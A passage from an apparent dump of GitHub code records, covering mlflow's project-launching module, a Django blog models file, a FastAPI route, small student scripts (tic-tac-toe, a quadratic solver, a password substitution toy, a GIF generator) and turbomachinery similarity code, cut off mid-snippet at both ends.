os.makedirs(storage_dir)\n return tempfile.mkdtemp(dir=storage_dir)\n\n\ndef _expand_uri(uri):\n if _is_local_uri(uri):\n return os.path.abspath(uri)\n return uri\n\n\ndef _is_local_uri(uri):\n \"\"\"Returns True if the passed-in URI should be interpreted as a path on the local filesystem.\"\"\"\n return not _GIT_URI_REGEX.match(uri)\n\n\ndef _fetch_project(uri, force_tempdir, version=None, git_username=None, git_password=None):\n \"\"\"\n Fetch a project into a local directory, returning the path to the local project directory.\n :param force_tempdir: If True, will fetch the project into a temporary directory. Otherwise,\n will fetch Git projects into a temporary directory but simply return the\n path of local projects (i.e. perform a no-op for local projects).\n \"\"\"\n parsed_uri, subdirectory = _parse_subdirectory(uri)\n use_temp_dst_dir = force_tempdir or not _is_local_uri(parsed_uri)\n dst_dir = tempfile.mkdtemp() if use_temp_dst_dir else parsed_uri\n if use_temp_dst_dir:\n eprint(\"=== Fetching project from %s into %s ===\" % (uri, dst_dir))\n if _is_local_uri(uri):\n if version is not None:\n raise ExecutionException(\"Setting a version is only supported for Git project URIs\")\n if use_temp_dst_dir:\n dir_util.copy_tree(src=parsed_uri, dst=dst_dir)\n else:\n assert _GIT_URI_REGEX.match(parsed_uri), \"Non-local URI %s should be a Git URI\" % parsed_uri\n _fetch_git_repo(parsed_uri, version, dst_dir, git_username, git_password)\n res = os.path.abspath(os.path.join(dst_dir, subdirectory))\n if not os.path.exists(res):\n raise ExecutionException(\"Could not find subdirectory %s of %s\" % (subdirectory, dst_dir))\n return res\n\n\ndef _fetch_git_repo(uri, version, dst_dir, git_username, git_password):\n \"\"\"\n Clone the git repo at ``uri`` into ``dst_dir``, checking out commit ``version`` (or defaulting\n to the head commit of the repository's master branch if version is unspecified).\n If ``git_username`` and ``git_password`` are specified, uses them to authenticate while fetching\n the repo. Otherwise, assumes authentication parameters are specified by the environment,\n e.g. by a Git credential helper.\n \"\"\"\n # We defer importing git until the last moment, because the import requires that the git\n # executable is availble on the PATH, so we only want to fail if we actually need it.\n import git\n repo = git.Repo.init(dst_dir)\n origin = repo.create_remote(\"origin\", uri)\n git_args = [git_username, git_password]\n if not (all(arg is not None for arg in git_args) or all(arg is None for arg in git_args)):\n raise ExecutionException(\"Either both or neither of git_username and git_password must be \"\n \"specified.\")\n if git_username:\n git_credentials = \"url=%s\\nusername=%s\\npassword=%s\" % (uri, git_username, git_password)\n repo.git.config(\"--local\", \"credential.helper\", \"cache\")\n process.exec_cmd(cmd=[\"git\", \"credential-cache\", \"store\"], cwd=dst_dir,\n cmd_stdin=git_credentials)\n origin.fetch()\n if version is not None:\n repo.git.checkout(version)\n else:\n repo.create_head(\"master\", origin.refs.master)\n repo.heads.master.checkout()\n\n\ndef _get_conda_env_name(conda_env_path):\n conda_env_contents = open(conda_env_path).read() if conda_env_path else \"\"\n return \"mlflow-%s\" % hashlib.sha1(conda_env_contents.encode(\"utf-8\")).hexdigest()\n\n\ndef _get_conda_bin_executable(executable_name):\n \"\"\"\n Return path to the specified executable, assumed to be discoverable within the 'bin'\n subdirectory of a conda installation.\n\n The conda home directory (expected to contain a 'bin' subdirectory) is configurable via the\n ``mlflow.projects.MLFLOW_CONDA_HOME`` environment variable. If\n ``mlflow.projects.MLFLOW_CONDA_HOME`` is unspecified, this method simply returns the passed-in\n executable name.\n \"\"\"\n conda_home = os.environ.get(MLFLOW_CONDA_HOME)\n if conda_home:\n return os.path.join(conda_home, \"bin/%s\" % executable_name)\n return executable_name\n\n\ndef _get_or_create_conda_env(conda_env_path):\n \"\"\"\n Given a `Project`, creates a conda environment containing the project's dependencies if such a\n conda environment doesn't already exist. Returns the name of the conda environment.\n \"\"\"\n conda_path = _get_conda_bin_executable(\"conda\")\n try:\n process.exec_cmd([conda_path, \"--help\"], throw_on_error=False)\n except EnvironmentError:\n raise ExecutionException(\"Could not find Conda executable at {0}. \"\n \"Ensure Conda is installed as per the instructions \"\n \"at https://conda.io/docs/user-guide/install/index.html. You can \"\n \"also configure MLflow to look for a specific Conda executable \"\n \"by setting the {1} environment variable to the path of the Conda \"\n \"executable\".format(conda_path, MLFLOW_CONDA_HOME))\n (_, stdout, _) = process.exec_cmd([conda_path, \"env\", \"list\", \"--json\"])\n env_names = [os.path.basename(env) for env in json.loads(stdout)['envs']]\n project_env_name = _get_conda_env_name(conda_env_path)\n if project_env_name not in env_names:\n eprint('=== Creating conda environment %s ===' % project_env_name)\n if conda_env_path:\n process.exec_cmd([conda_path, \"env\", \"create\", \"-n\", project_env_name, \"--file\",\n conda_env_path], stream_output=True)\n else:\n process.exec_cmd(\n [conda_path, \"create\", \"-n\", project_env_name, \"python\"], stream_output=True)\n return project_env_name\n\n\ndef _maybe_set_run_terminated(active_run, status):\n \"\"\"\n If the passed-in active run is defined and still running (i.e. hasn't already been terminated\n within user code), mark it as terminated with the passed-in status.\n \"\"\"\n if active_run is None:\n return\n run_id = active_run.info.run_uuid\n cur_status = tracking.get_service().get_run(run_id).info.status\n if RunStatus.is_terminated(cur_status):\n return\n tracking.get_service().set_terminated(run_id, status)\n\n\ndef _get_entry_point_command(project, entry_point, parameters, conda_env_name, storage_dir):\n \"\"\"\n Returns the shell command to execute in order to run the specified entry point.\n :param project: Project containing the target entry point\n :param entry_point: Entry point to run\n :param parameters: Parameters (dictionary) for the entry point command\n :param conda_env_name: Name of conda environment to use for command execution, or None if no\n conda environment should be used.\n :param storage_dir: Base local directory to use for downloading remote artifacts passed to\n arguments of type 'path'. If None, a temporary base directory is used.\n \"\"\"\n storage_dir_for_run = _get_storage_dir(storage_dir)\n eprint(\"=== Created directory %s for downloading remote URIs passed to arguments of \"\n \"type 'path' ===\" % storage_dir_for_run)\n commands = []\n if conda_env_name:\n activate_path = _get_conda_bin_executable(\"activate\")\n commands.append(\"source %s %s\" % (activate_path, conda_env_name))\n commands.append(\n project.get_entry_point(entry_point).compute_command(parameters, storage_dir_for_run))\n return \" && \".join(commands)\n\n\ndef _run_entry_point(command, work_dir, experiment_id, run_id):\n \"\"\"\n Run an entry point command in a subprocess, returning a SubmittedRun that can be used to\n query the run's status.\n :param command: Entry point command to run\n :param work_dir: Working directory in which to run the command\n :param run_id: MLflow run ID associated with the entry point execution.\n \"\"\"\n env = os.environ.copy()\n env.update(_get_run_env_vars(run_id, experiment_id))\n eprint(\"=== Running command '%s' in run with ID '%s' === \" % (command, run_id))\n process = subprocess.Popen([\"bash\", \"-c\", command], close_fds=True, cwd=work_dir, env=env)\n return LocalSubmittedRun(run_id, process)\n\n\ndef _build_mlflow_run_cmd(\n uri, entry_point, storage_dir, use_conda, run_id, parameters):\n \"\"\"\n Build and return an array containing an ``mlflow run`` command that can be invoked to locally\n run the project at the specified URI.\n \"\"\"\n mlflow_run_arr = [\"mlflow\", \"run\", uri, \"-e\", entry_point, \"--run-id\", run_id]\n if storage_dir is not None:\n mlflow_run_arr.extend([\"--storage-dir\", storage_dir])\n if not use_conda:\n mlflow_run_arr.append(\"--no-conda\")\n for key, value in parameters.items():\n mlflow_run_arr.extend([\"-P\", \"%s=%s\" % (key, value)])\n return mlflow_run_arr\n\n\ndef _run_mlflow_run_cmd(mlflow_run_arr, env_map):\n \"\"\"\n Invoke ``mlflow run`` in a subprocess, which in turn runs the entry point in a child process.\n Returns a handle to the subprocess. Popen launched to invoke ``mlflow run``.\n \"\"\"\n final_env = os.environ.copy()\n final_env.update(env_map)\n # Launch `mlflow run` command as the leader of its own process group so that we can do a\n # best-effort cleanup of all its descendant processes if needed\n return subprocess.Popen(\n mlflow_run_arr, env=final_env, universal_newlines=True, preexec_fn=os.setsid)\n\n\ndef _create_run(uri, experiment_id, work_dir, entry_point, parameters):\n \"\"\"\n Create a ``Run`` against the current MLflow tracking server, logging metadata (e.g. the URI,\n entry point, and parameters of the project) about the run. Return an ``ActiveRun`` that can be\n used to report additional data about the run (metrics/params) to the tracking server.\n \"\"\"\n if _is_local_uri(uri):\n source_name = tracking.utils._get_git_url_if_present(_expand_uri(uri))\n else:\n source_name = _expand_uri(uri)\n active_run = tracking.get_service().create_run(\n experiment_id=experiment_id,\n source_name=source_name,\n source_version=_get_git_commit(work_dir),\n entry_point_name=entry_point,\n source_type=SourceType.PROJECT)\n if parameters is not None:\n for key, value in parameters.items():\n tracking.get_service().log_param(active_run.info.run_uuid, key, value)\n return active_run\n\n\ndef _get_run_env_vars(run_id, experiment_id):\n \"\"\"\n Returns a dictionary of environment variable key-value pairs to set in subprocess launched\n to run MLflow projects.\n \"\"\"\n return {\n tracking._RUN_ID_ENV_VAR: run_id,\n tracking._TRACKING_URI_ENV_VAR: tracking.get_tracking_uri(),\n tracking._EXPERIMENT_ID_ENV_VAR: str(experiment_id),\n }\n\n\ndef _invoke_mlflow_run_subprocess(\n work_dir, entry_point, parameters, experiment_id, use_conda, storage_dir, run_id):\n \"\"\"\n Run an MLflow project asynchronously by invoking ``mlflow run`` in a subprocess, returning\n a SubmittedRun that can be used to query run status.\n \"\"\"\n eprint(\"=== Asynchronously launching MLflow run with ID %s ===\" % run_id)\n mlflow_run_arr = _build_mlflow_run_cmd(\n uri=work_dir, entry_point=entry_point, storage_dir=storage_dir, use_conda=use_conda,\n run_id=run_id, parameters=parameters)\n mlflow_run_subprocess = _run_mlflow_run_cmd(\n mlflow_run_arr, _get_run_env_vars(run_id, experiment_id))\n return LocalSubmittedRun(run_id, mlflow_run_subprocess)\n","repo_name":"rstudio/mlflow-original","sub_path":"mlflow/projects/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":19966,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"79"} +{"seq_id":"42024075235","text":"from django.contrib.auth import get_user_model\nfrom django.db import models\n\nUser = get_user_model()\n\nLENGTH_TEXT = 15\n\n\nclass Group(models.Model):\n title = models.CharField(max_length=200)\n slug = models.SlugField(max_length=50, unique=True)\n description = models.TextField()\n\n def __str__(self) -> str:\n return self.title\n\n\nclass Post(models.Model):\n text = models.TextField(\n 'Текст поста',\n help_text='Введите текст поста'\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n verbose_name='author',\n related_name='posts'\n )\n pub_date = models.DateTimeField(\n auto_now_add=True,\n verbose_name='publish date',\n db_index=True\n )\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n related_name='posts',\n blank=True,\n null=True,\n verbose_name='group',\n help_text='Группа, к которой будет относиться пост'\n )\n image = models.ImageField(\n 'Картинка',\n upload_to='posts/',\n blank=True\n )\n\n class Meta:\n ordering = ('-pub_date',)\n verbose_name = 'post'\n verbose_name_plural = 'posts'\n\n def __str__(self):\n return self.text[:LENGTH_TEXT]\n\n\nclass Comment(models.Model):\n post = models.ForeignKey(\n Post,\n on_delete=models.CASCADE,\n related_name='comments',\n verbose_name='post',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='comments',\n verbose_name='author',\n )\n text = models.TextField(\n 'Текст поста',\n help_text='Введите текст поста'\n )\n created = models.DateTimeField(\n auto_now_add=True,\n verbose_name='дата публикации',\n db_index=True\n )\n\n class Meta:\n verbose_name = 'comment'\n verbose_name_plural = 'comments'\n ordering = ('-created',)\n\n def __str__(self):\n return self.text[:LENGTH_TEXT]\n\n\nclass Follow(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='follower',\n verbose_name='follower',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='following',\n verbose_name='author',\n )\n\n class Meta:\n verbose_name = 'following'\n verbose_name_plural = 'followings'\n ordering = ('author',)\n constraints = (\n models.UniqueConstraint(\n fields=('user', 'author'),\n name='user_author_constraints',\n ),\n models.CheckConstraint(\n check=~models.Q(user=models.F('author')),\n name='user_author_unique'\n ),\n )\n","repo_name":"skiba-py/yatube","sub_path":"yatube/posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30796970186","text":"import json\nfrom fastapi import APIRouter, Cookie, Depends, HTTPException, Query, Request, Response, File, UploadFile, Form\nfrom models.runtime import Runtime\nfrom utils.motor import L\nruntime_route = APIRouter(\n prefix=\"/runtime\",\n tags=[\"runtime | 运行环境\"],\n)\n\n@runtime_route.get('/')\nasync def get_runtime_list():\n runtime_list = await L(Runtime.objects.as_pymongo())\n return {\n 'data': runtime_list,\n }\n\n","repo_name":"VegeMarket/irori_judger","sub_path":"routers/v2/runtime.py","file_name":"runtime.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70429125","text":"'''\r\n# a senha precisa de:\r\n# maiuscilas e minusculas\r\n# simbolos e espaços\r\n\r\n# a senha terá uma base chave, por exemplo:\r\n# Security = base\r\n# 5ecur1ty = senha\r\n'''\r\nchave = input('Digite a base da sua senha: ')\r\n\r\nsenha = ''\r\n\r\nfor letra in chave:\r\n if letra in \"Aa\": \r\n senha += '3'\r\n elif letra in \"Dd\":\r\n senha += '7'\r\n elif letra in \"Ss\":\r\n senha += '2'\r\n elif letra in \"Vv\":\r\n senha += 'ç'\r\n elif letra in \"Oo\":\r\n senha += '6'\r\n else:\r\n senha += letra\r\n\r\nprint(senha)\r\n","repo_name":"vitor001/Python","sub_path":"Gerador de senha.py","file_name":"Gerador de senha.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"43806057672","text":"import distutils.command.clean\nimport glob\nimport os\nimport shutil\nimport subprocess\nfrom typing import Dict, Union, List\n\nfrom setuptools import setup, find_namespace_packages\n\n# Package name\npackage_name = \"distcp_playground\"\n\n# Version information\ncwd: str = os.path.dirname(os.path.abspath(__file__))\nversion_txt: str = os.path.join(cwd, \"version.txt\")\nwith open(version_txt, \"r\") as f:\n version: str = f.readline().strip()\n\ntry:\n sha: str = (\n subprocess.check_output([\"git\", \"rev-parse\", \"HEAD\"], cwd=cwd)\n .decode(\"ascii\")\n .strip()\n )\nexcept Exception:\n sha = \"Unknown\"\n\nif os.getenv(\"BUILD_VERSION\"):\n version = os.getenv(\"BUILD_VERSION\", version)\nelif sha != \"Unknown\":\n version += \"+\" + sha[:7]\n\n\ndef write_version_file() -> None:\n version_path = os.path.join(cwd, \"distcp_playground\", \"version.py\")\n with open(version_path, \"w\") as f:\n f.write(\"__version__ = '{}'\\n\".format(version))\n f.write(\"git_version = {}\\n\".format(repr(sha)))\n\n\n# Package requirements\nrequirements = [\n # This represents a nightly version of PyTorch.\n # It can be installed as a binary or from source.\n \"torch>=1.12.0.dev\"\n]\n\nclass clean(distutils.command.clean.clean): # type: ignore\n def run(self) -> None:\n\n with open(\".gitignore\", \"r\") as f:\n ignores = f.read()\n for wildcard in filter(None, ignores.split(\"\\n\")):\n for filename in glob.glob(wildcard):\n try:\n os.remove(filename)\n except OSError:\n shutil.rmtree(filename, ignore_errors=True)\n\n # It's an old-style class in Python 2.7...\n distutils.command.clean.clean.run(self) # type: ignore\n\n\nif __name__ == \"__main__\":\n write_version_file()\n\n setup(\n # Metadata\n name=package_name,\n version=version,\n author=\"Rodrigo Kumpera\",\n url=\"https://https://github.com/kumpera/distcp-playground\",\n description=\"PyTorch Distributed checkpoint random basket of prototypes\",\n license=\"MIT\",\n # Package info\n packages=find_namespace_packages(),\n install_requires=requirements,\n # extras_require=extras,\n cmdclass={\"clean\": clean},\n )\n","repo_name":"kumpera/distcp-playground","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29114060462","text":"import time\ndef fmt_time(time_string): #返回时间元组和时间戳\n stamp = str(time.mktime(time.strptime(time_string,\"%Y%m%d%H%M%S\")))\n return stamp\n\ndef token_is_valid(token_create_time):#检查TOKEN是否已经过时的函数\n ts1 = fmt_time(token_create_time)\n #print(str(ts1))\n ts2 = fmt_time(get_time_string())\n #print(str(ts2))\n if 0 < float(ts1) - float(ts2) < 3600 :\n return True\n else :\n return False\n\ndef get_time_string():#这是一个获取当前时间字符串格式的函数(精确到秒\n localtime = time.localtime(time.time())\n if localtime[1] <= 10:#格式化月份\n mon = '0' + str(localtime[1])\n else:\n mon = str(localtime[1])\n if localtime[2] <= 10:#天\n day = '0' + str(localtime[2])\n else:\n day = str(localtime[2])\n if localtime[3] <= 10:#小时\n hour = '0' + str(localtime[3])\n else:\n hour = str(localtime[3])\n if localtime[4] <= 10:#分钟\n min = '0' + str(localtime[4])\n else:\n min = str(localtime[4])\n if localtime[5] <= 10:#秒\n sec = '0' + str(localtime[5])\n else:\n sec = str(localtime[5])\n time_entity = str(localtime[0])+mon+day+hour+min+sec\n return time_entity\n\nprint(token_is_valid('20200426180000'))","repo_name":"DCZYewen/OpenOLS","sub_path":"Test_Folder/Token_Test.py","file_name":"Token_Test.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"28187320401","text":"from PIL import Image, ImageDraw, ImageFont\nimport random\n\ncolor = (\n random.randint(0, 255),\n random.randint(0, 255),\n random.randint(0, 255)\n)\n\nccolor = (\n max(color) + min(color) - color[0],\n max(color) + min(color) - color[1],\n max(color) + min(color) - color[2]\n)\n\nFZDBSJWFont = ImageFont.truetype('FZDBSJW.TTF', 180)\niml = Image.new('RGB', (300, 300), color)\nimr = Image.new('RGB', (300, 300), ccolor)\n\nframes = []\n\nimg = Image.new('RGB', (600, 300))\nimg.paste(imr, (300, 0))\nimg.paste(iml, (0, 0))\ntext = ImageDraw.Draw(img)\ntext.text((60, 55), \"色\", font=FZDBSJWFont, fill=ccolor)\ntext.text((365, 55), \"图\", font=FZDBSJWFont, fill=color)\nframes.append(img)\n\nimg = Image.new('RGB', (600, 300))\nimg.paste(iml, (300, 0))\nimg.paste(imr, (0, 0))\ntext = ImageDraw.Draw(img)\ntext.text((60, 55), \"色\", font=FZDBSJWFont, fill=color)\ntext.text((365, 55), \"图\", font=FZDBSJWFont, fill=ccolor)\nframes.append(img)\n\nframes[0].save(\"test.gif\", format='GIF', append_images=frames[1:], save_all=True, duration=100, loop=0) ","repo_name":"djkcyl/Random-dynamic-colormap-generation","sub_path":"Random dynamic color map generation.py","file_name":"Random dynamic color map generation.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"14404228458","text":"import socketio\nimport asyncio\nimport time\n\nsio = socketio.AsyncClient()\n\n# CREATE EVENT HANDLERS\n@sio.on('event_name')\nasync def event_handler_function():\n print(\"event happened\")\n\n# CALL EVENTS\nasync def call_event_function():\n await sio.emit('event_name', data)\n\n# EXAMPLE\n@sio.on('pingmebaby')\nasync def event_name():\n print(\"ping!\")\n\nasync def ping():\n await sio.emit('pingmebaby')\n\n# MAIN PROCESS FUNCTION\nasync def main_process():\n while True:\n await asyncio.sleep(10)\n await ping()\n\n# DEFAULT EVENTS AND SETUP\n@sio.event\ndef connect():\n print(\"I'm connected!\")\n\n@sio.event\ndef connect_error():\n print(\"The connection failed!\")\n\n@sio.event\ndef disconnect():\n print(\"I'm disconnected!\")\n\nasync def connect_to_server():\n await sio.connect('http://localhost:8080') # Connect to local server\n # await sio.connect('https://backend.healthmonitor.dev') # Connect to cloud server\n await sio.wait()\n\nasync def background_process():\n # Wait until connection is established\n while not sio.sid:\n print(\"Connecting...\")\n await asyncio.sleep(1)\n\n # Run main process\n await main_process()\n\nasync def main():\n await asyncio.gather(\n connect_to_server(),\n background_process(),\n )\n\nasyncio.run(main())","repo_name":"connorsparling/HealthMonitorUnit","sub_path":"PythonSocket/pysocket.py","file_name":"pysocket.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26760019851","text":"import os\n\n# Intilize a list for the board with empty strings\n# Note: we create a list with 10 slots, but we discard the first slot so we have a 9 slots board\nboard = [' ' for _ in range(10)]\n\ndef insert_letter(letter, pos):\n \"\"\"\n Function in charge to assign the letter X or O to its right position on the board.\n \"\"\"\n board[int(pos)] = letter\n\ndef is_space_free(pos):\n \"\"\"\n Function that checks if a position of the board is empty or used.\n \"\"\"\n return board[int(pos)] == ' '\n\ndef is_board_full(board):\n \"\"\"\n Function that checks if the the board positions are empty of full.\n \"\"\"\n return not board.count(' ') > 1\n\ndef winner_check(board, letter):\n \"\"\"\n Function that checks if the given letter has completed a line.\n \"\"\"\n return (\n # Horizontal check\n (board[1] == letter and board[2] == letter and board[3] == letter) or\n (board[4] == letter and board[5] == letter and board[6] == letter) or\n (board[7] == letter and board[8] == letter and board[9] == letter) or\n # Vertical check\n (board[1] == letter and board[4] == letter and board[7] == letter) or\n (board[2] == letter and board[5] == letter and board[8] == letter) or\n (board[3] == letter and board[6] == letter and board[9] == letter) or\n # Diagonal\n (board[1] == letter and board[5] == letter and board[9] == letter) or\n (board[3] == letter and board[5] == letter and board[7] == letter)\n )\n\ndef draw_board(board):\n \"\"\"\n Function that draw the board acording to user input.\n \"\"\"\n return f\"\"\"\n | | \n {board[1]} | {board[2]} | {board[3]} \n | | \n -----------\n | | \n {board[4]} | {board[5]} | {board[6]} \n | | \n -----------\n | | \n {board[7]} | {board[8]} | {board[9]} \n | | \n \"\"\"\n\ndef player_move():\n \"\"\"\n Function that checks wheter the player made a good move or not.\n \"\"\"\n while True:\n try:\n position = input(\"Select a position to place an 'X' (1-9): \")\n if int(position) >= 1 and int(position) <= 9:\n if is_space_free(position):\n insert_letter('X', position)\n # If the letter is succesfully inserted\n # Exit the player move function so the machine\n break\n else:\n print('Oops, this space is already ocupied.')\n else:\n raise ValueError\n except ValueError:\n print('Make sure you entered a valid number between 1 to 9')\n\ndef select_random(li):\n import random\n ln = len(li)\n r = random.randrange(0, ln)\n return li[r]\n\ndef computer_move():\n \"\"\"\n \n \"\"\"\n possible_moves = [x for x, letter in enumerate(board) if letter == ' ' and x != 0]\n move = 0\n\n for let in ['O', 'X']:\n for i in possible_moves:\n board_copy = board[:]\n board_copy[i] = let\n if winner_check(board_copy, let):\n move = i\n return move\n \n corners_open = list()\n for i in possible_moves:\n if i in [1, 3, 7, 9]:\n corners_open.append(i)\n \n if len(corners_open) > 0:\n move = select_random(corners_open)\n return move\n \n if 5 in possible_moves:\n move = 5\n return move\n \n edges_open = list()\n for i in possible_moves:\n if i in [2, 4, 6, 8]:\n edges_open.append(i)\n \n if len(edges_open) > 0:\n move = select_random(edges_open)\n return move\n \n return move\n\n\ndef main():\n os.system('clear')\n print('Welcome to the Tic Tac Toe game.')\n print(draw_board(board))\n\n while not is_board_full(board):\n # Checking for the computer\n if not winner_check(board, 'O'):\n player_move()\n print(draw_board(board))\n else:\n os.system('clear')\n print(draw_board(board))\n print('Sorry, you lose.')\n break\n \n # Checking for the player\n if not winner_check(board, 'X'):\n position = computer_move()\n if position == 0:\n os.system('clear')\n print(draw_board(board))\n print(\"Tie game.\")\n else:\n os.system('clear')\n insert_letter('O', position)\n print(f\"Computer placed an O on position {position}.\")\n print(draw_board(board))\n else:\n os.system('clear')\n print(draw_board(board))\n print('You win!')\n break\n\n\nmain()\nwhile True:\n user = input(\"Do you want to play again? Y/N: \")\n if user.lower() == 'y':\n board = [' ' for _ in range(10)]\n print('-----------------------------------')\n main()\n else:\n break","repo_name":"angeloxlan/python-bootcamp","sub_path":"tic_tac_toe/tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":4879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19073474057","text":"from turboCoeff import similarity\n\n# data\n# constraints\nmFlux = 100 # mass flux [kg/s]\nbetaP = 1.45 # compression ratio [--]\nmaxD = 0.9 # maximum tip diameter [m]\nmaxR = maxD/2 # maximum tip radius [m]\n\n# inlet values\nPt0 = 1e+5 # inlet total pressure [Pa]\nTt0 = 300 # inlet total temperature [K]\n\n# choosed quantities\nrD = 0.58\nrMean = 0.32\n\n# mean line properties study \nV0vec, V1vec, V2vec, bladeVec, rotationVec = similarity.propertiesStudy(mFlux, betaP, Pt0, Tt0, input=[rD, rMean], rDmin=0.5, rDmax=0.73, rMeanMin=0.25, rMeanMax=0.4, Vt0Umean=0, plot=False, save=True, position='latex/figures/rMeanChi.pdf')\n\n# data allocation \nVa0 = V0vec[0]\nVt0 = V0vec[1]\nVa1 = V1vec[0]\nVt1 = V1vec[1]\nomega = rotationVec[1]\nbladeHeight = bladeVec[0]\nhubRadius = rMean - bladeHeight/2\nrMean = [rMean, rMean]\nVtMean = [Vt0, Vt1]\nVaMean = [Va0, Va1]\n\nWtTarget = 0\nbVal = (WtTarget + omega * hubRadius - Vt1 * rMean[1]/hubRadius)/(hubRadius - rMean[1]**2/hubRadius)\nb = [0, bVal]\n\ndef func(r):\n Vt2new = Vt1 * (rMean[1] / r)**-0.6\n\n return Vt2new\n\n# angle and velocity study along the blade span\nsimilarity.deltaAngleStudy(hubRadius, bladeHeight, rMean, VtMean, VaMean, omega, kind=['FV', 'MVD'], a=[0,0], b=b, n=[0,0], nSection=50, save=True, position='latex/figures/betaAngles.pdf')\n\n# data allocation \nVa1 = V1vec[0]\nVt1 = V1vec[1]\nVa2 = V2vec[0]\nVt2 = V2vec[1]\nVtMean = [Vt1, Vt2]\nVaMean = [Va1, Va2]\n\nbVal = (omega - Vt1 * rMean[1]/hubRadius**2)/(1 - rMean[1]**2/hubRadius**2)\nWtTarget = -omega*hubRadius*1.5*0\nbVal1 = (WtTarget + omega * hubRadius - Vt1 * rMean[1]/hubRadius)/(hubRadius - rMean[1]**2/hubRadius)\nb = [bVal1, 0]\nomega = 0\n\nVtTarget = 30\ndef func(r):\n a = 4 * VtTarget / bladeHeight**2\n Vt = a * (r - rMean[1])**2\n\n return Vt\n\n# stator angles and velocity study \nsimilarity.deltaAngleStudy(hubRadius, bladeHeight, rMean, VtMean, VaMean, omega, kind=['MVD', 'eqn'], a=[0,0], b=b, n=[0,0], nSection=50, func2=func, save=True, position='latex/figures/alphaAngles.pdf')\n","repo_name":"antoniopucciarelli/turboLIB","sub_path":"similarityStudy.py","file_name":"similarityStudy.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"19300604213","text":"# Реализовать скрипт, который решает квадратное уравнение вида 𝑎𝑥2 + 𝑏𝑥 + 𝑐 = 0.\n# Параметры квадратного уравнения 𝑎, 𝑏, 𝑐 задаются вводом или через аргументы командной строки.\n# В скрипте реализовать несколько функций, которые декомпозируют задачу решения квадратного\n# уравнения. В эти функции должны передаваться параметры. Также на эти функций написать UnitTests.\n# Основной скрипт solv_square_equation.py должен иметь следующие функции:\n# - main()\n# - validate_param(int) - проверяет, что введено число, повторяет ввод 3 раза если не число\n# (использовать exception)\n# - discriminant(a, b, c)\n# - roots(d, a, b, c)\n# - solv_square(a, b, c) -> roots\n# - square_print(a, b, c, roots) – выводит на экран результат\n# на выделенные написать UnitTest.\n# Не использовать глобальные переменные.\n\ndef validate_param(int):\n i = 0\n while True:\n try:\n int = int(input()) \n except ValueError:\n print(\"Not an integer! Try again.\")\n if i == 2:\n break\n else:\n i += 1\n continue\n else:\n return int \n break \n\ndef discriminant(a, b, c):\n d = (b ** 2) - (4 * a * c)\n roots (d, a, b, c)\n return d\n\ndef roots(d, a, b, c):\n # если D < 0, корней нет;\n # если D = 0, есть один корень;\n # если D > 0, есть два различных корня.\n #print('i am from roots ' + str(a) + str(b) + str(c) + str(d) )\n if d < 0:\n print('Quadratic equation have not roots')\n return 'd < 0'\n elif d == 0:\n #х = −b/2a\n root = -b/(2*a)\n print('Quadratic equation have 1 roots '+ str(root) + ' from quadratic equation '+ str(a) + 'x**2' + '+' + '(' + str(b) + ')' + 'x' + '+' + '(' + str(c) + ')' '=0')\n return 'd == 0'\n elif d > 0:\n print('Quadratic equation have two roots')\n solv_square(a, b, c)\n return 'd > 0'\n \n\ndef solv_square(a, b, c):\n d = (b**2) - (4*a*c)\n root1 = (-b + (d**0.5))/(2*a)\n root2 = (-b - (d**0.5))/(2*a)\n roots = str(root1) +' and '+ str(root2)\n square_print(a, b, c, roots)\n return root1,root2\n\ndef square_print(a, b, c, roots):\n print('Roots are: ' + str(roots) + ' from quadratic equation '+ str(a) + 'x**2' + '+' + '(' + str(b) + ')' + 'x' + '+' + '(' + str(c) + ')' '=0' )\n #return None\n\ndef main():\n print('Enter fist member A: ')\n a = validate_param(int)\n #print(a)\n if a == 0:\n print('Bad way for quadratic equation a=0')\n exit\n elif a != None:\n print('Enter fist member B: ')\n b = validate_param(int)\n #print(b) \n print('Enter fist member C: ')\n c = validate_param(int)\n #print(c) \n discriminant(a, b, c)\n else:\n exit\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"dmalyshok/DevOps_online_Kiev_2021Q4","sub_path":"m8/task8.1/solv_square_equation.py","file_name":"solv_square_equation.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2349329704","text":"import tensorflow as tf\nimport numpy as np\nfrom scipy import stats\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"/tmp/data/\", one_hot=True)\nX_train,y_train = mnist.train.next_batch(5000)\nX_test, y_test = mnist.test.next_batch(100)\nk=3\ntarget_x= tf.placeholder(\"float\",[1784])\nX = tf.placeholder(\"float\",[None, 